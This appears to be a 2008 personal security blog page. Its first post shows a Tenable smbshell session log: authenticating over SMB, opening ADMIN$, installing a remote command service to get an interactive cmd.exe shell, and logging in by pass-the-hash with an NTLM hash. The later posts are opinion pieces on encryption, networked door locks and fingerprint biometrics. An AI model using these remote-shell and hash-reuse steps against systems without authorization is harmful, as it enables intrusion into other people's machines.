Playing with smbshell

Copy paste from here:

Description

smbshell is a pre-compiled NASL script which can be used as a standalone tool to do the following tasks :

  • Navigate thru the remote SMB shares and download files or obtain their version number
  • Read/Enumerate the remote SMB registry
  • Query/Start/Stop/Pause remote services
  • Obtain an interactive shell (cmd.exe) on the remote host

http://cgi.tenablesecurity.com/tenable/smbshell.php

Installation

smbshell is a pre-compiled NASL script - therefore, you need to install Nessus 3 first.
To run smbshell, download it and run it thru the 'nasl' command-line utility : 

$ /opt/nessus/bin/nasl -t TargetIP smbshell.nbin<br /></pre>   Under Windows, you need to copy it under C:\Program Files\Tenable\Nessus\Plugins\Scripts\. Then you can do : <pre>C:\> Program Files\Tenable\Nessus\nasl.exe -t TargetIP smbshell.nbin<br />

Usage

cg@WPAD:~/evil/passthehashstuff$ /opt/nessus/bin/nasl -t 192.168.0.103 smbshell.nbin

--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--

[*] username: smbshell
[*] password:
[*] domain (optional):
[*] Connecting to 192.168.0.103...
[*] Authenticating to 192.168.0.103...

smbshell> help

The following commands are supported :

help - the current screen
ftp - SMB ftp client
reg - registry browser
users - SMB users & groups browser
services - service manager
quit/exit - exit

smbshell>

oh and shell, shell is fun

shell

[*] Opening share ADMIN$...
[*] Connected to ADMIN$ (192.168.0.100:41095 -> 192.168.0.101:445)
[*] Installing remote command service...
[*] Remote command service installed.
[*] Connecting to remote command service...
[*] Connected to remote command service.

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>echo woot
echo woot
woot

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Media disconnected

Ethernet adapter Wireless Network Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.0.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.0.1

C:\WINDOWS\system32>
C:\WINDOWS\system32>exit

[*] Removing remote command service...
[*] Remote command service removed.

Pass the Hash info
http://blog.tenablesecurity.com/2007/06/lmntlm-hash-sup.html

###########################################

--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--

[*] username: administrator
[*] password: **Just hit enter here**
[*] hash: NTLM:78164FD1E988FE5B39E0474EEE475E51
[*] domain (optional):
[*] Connecting to 172.11.12.184...
[*] Authenticating to 172.11.12.184...

smbshell>

If you have no idea what nasl is
http://blog.tenablesecurity.com/2007/06/using-the-nasl-.html

Thanks to MC for bringing this up to me.

Lastly, If I see this shit in some "cutting edge hacker techniques" webcast without a mention of this post I'm gonna go off because this has been out for over two years...I'll leave it at that.

  • By JF
  • November 12th, 2008
  • Posted in Security
  • 615 views
  English (US) latin1  
 

About disc encryption

From zdnet:

Faced with the thought of a USB drive, notebook PC or backup tape going missing, most IT managers look to some form of encryption as the first layer of defence. However, according to one storage security expert, that's largely a pointless exercise.

"I often refer to encryption as crypto fairy dust," Eric Hibbard, chair of the Security Technical Working Group in the Storage Network Industry Association, said in a recent interview. "A lot of IT managers sprinkle this on and think it makes certain problems go away."

The reality, Hibbard suggested, is rather different. "If you're doing encryption in the storage ecosystem, the pay off is very limited. A hard drive or tape drive wandering off is a real problem, but that's not a data confidentiality issue; it's a media confidentiality issue. If you're talking about sensitive information, encryption is just one tool in the toolbox. If you don't have that mated to tight authentication and access control, you're screwed."

Of course, there are plenty of reasons why such a mating isn't happening. Getting to that kind of integrated nirvana is a worthy goal, but rarely happens in IT environments where heterogeneity is a fact of life. There simply isn't time, budget or staffing expertise to bring it all together, so access control tends to be limited to the most pressing projects.


I have to agree with him: Lost (as in not-in-the-building-or-where-it-should-be) data usually means there's a problem with how the data is handled. Encryption can be a good way to prevent such data from being used by third parties due to it being mangled in such a way that it's very hard to read it.
First thing that should be done, before any USB stick is allowed into the company, those USB sticks have to be encrypted. That way, if data is lost, it's not too bad.
After that, if a stick is lost, it is time to figure out how the data was lost in the first place and make sure that it doesn't happen again. How many times has there not been some kind of data loss by one company or agency or another? If the disks are encrypted by default, the loss of a USB stick only means that the IT department will have to get another USB stick and the company will have to see to better security. If the disks are not encrypted by default, well...it could be as bad as the company going down.
Thirdly, once the layers of security (encryption layer, procedural layer and physical security layer) are implemented, you'll have one less hole to worry about.

  • By JF
  • September 29th, 2008
  • Posted in Security
  • 197 views
  English (US) latin1  
 

Unlocking the house from the 'net

From http://www.theinquirer.net/gb/inquirer/news/2008/09/04/unlock-house-via-internet:

THE CEDIA EXPO in Denver has been wowed by some cunning gear designed by Schlage which makes door locks that can be wirelessly set or opened via the Internet, from a mobile phone or a computer.

Each of the battery-operated locks have keypads that are locked and unlocked with 4-digit access codes. Users who forget to lock a door and want to enter their code remotely can hop onto a Web portal or use software added to their mobile phones.

Schlage says the wireless signals sent to the locks are encrypted. Kit for the lock, which includes the lock and the wireless bridge to communicate with it will set you back $299. There's a $13 monthly fee to use the applications that let the locks be controlled remotely.

The back up device is still a set of metal keys which is how it has been done for more than 4,000 years.



Woohoo. Not only give burglars access to your house but also hackers for just $299 and $13 per month. I think I'll just stick with my police-approved keys, thank you very much.

I wonder if they could explain to me WHY anyone would want to use this? It gives quite a few additional hazards to the house:
- 4 digits means there are only 9999 different passwords. Any 80386 or faster computer can brute force that amount passwords in mere minutes.
- Unlocking over the net...sniffing, phishing, dns poisoning, sql injection, cross site scripting, and many many many more options to exploit to get the accesscodes...maybe even of all the users, depending on how secure THEIR website is.
- Oh...speaking about THEIR website, do you want a 3rd party you do not know to have the keys to your house?
- Battery operated locks...what happens if the locks run out of juice? Well...at least they have the same old fashioned backup metal strips as everyone does. But for some reason I doubt they're police approved.




Edit: I just saw that the locks are for interior-use only, according to the pictures. I hope their sales-people say that in their sales-pitch.

  • By JF
  • September 23rd, 2008
  • Posted in Security
  • 62 views
  English (US) latin1  
 

Password fatigue

I just read an interesting article on so-called password fatigue: http://software.silicon.com/security/0,39024655,39288051,00.htm


Short exerpt:


According to Comet, the rise in sales of PCs with biometrics scanners comes as a result of Britons seeking better security while becoming increasingly fed up with remembering numerous passwords.


To me this seems a bad way to go. Time and time again fingerprint biometrics (and most other biometrics for that matter) have been proven to be faulty and easily duplicated. Why would you trust your computer security to a password that's lying around all over the house, your car, your work, your supermarket and wherever you go? Not too long ago, a dutch supermarket tried using fingerprints to pay for groceries. They got hacked of course, just like a german supermarket in 2007. Since 1990 people have been warning about using fingerprints as a new type of password and yet noone has any clue about how insecure they really are. A few examples on this are:

http://www.youtube.com/watch?v=LA4Xx5Noxyo (english)
http://www.youtube.com/watch?v=3M8D4wWYgsc (german)

And there are so many many more manuals and howtos on how to duplicate and retrieve fingerprints it's just amazing.

  • By JF
  • September 16th, 2008
  • Posted in Security
  • 164 views
  English (US) latin1  
 

Slow Down!!!!!

Well, I just listened to a talk done by Carl Honore about slowing down. He does make quite a bit of sense, as many people I know do tend to do things too fast, do too many things and don't have time for anything other than the things they do.

But, to whoever reads this (if any), listen to it yourself and make up your own mind.

  English (US) latin1  
 
<< 1 2 3 4 5 6 7 >>
Free counter and web stats LBVD Word Netherlands DealExtreme